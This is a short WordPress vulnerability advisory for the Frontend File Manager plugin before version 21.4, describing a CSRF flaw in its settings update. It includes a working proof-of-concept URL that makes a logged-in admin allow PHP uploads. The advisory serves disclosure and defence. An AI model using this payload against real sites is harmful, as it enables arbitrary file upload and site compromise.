WordPress Plugin Vulnerabilities

Frontend File Manager < 21.4 - Arbitrary Settings Update via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack. As the plugin does not validate the allowed file type, this could lead to attackers making admins allowing PHP file to be uploaded by any authenticated users

Proof of Concept

Make a logged in admin open the URL below

https://example.com/wp-admin/admin-ajax.php?action=wpfm_save_settings&wpfm_file_types=php,html&wpfm_button_title=Select&wpfm_upload_title=Upload&wpfm_max_file_size=3mb&wpfm_disable_bootstarp=yes&wpfm_file_saved=File(s)+Uploaded!

Affects Plugins

Classification

Miscellaneous

Original Researcher
WPScan
Verified
Yes

Timeline

Publicly Published
2022-09-26 (about 1 years ago)
Added
2022-09-26 (about 1 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other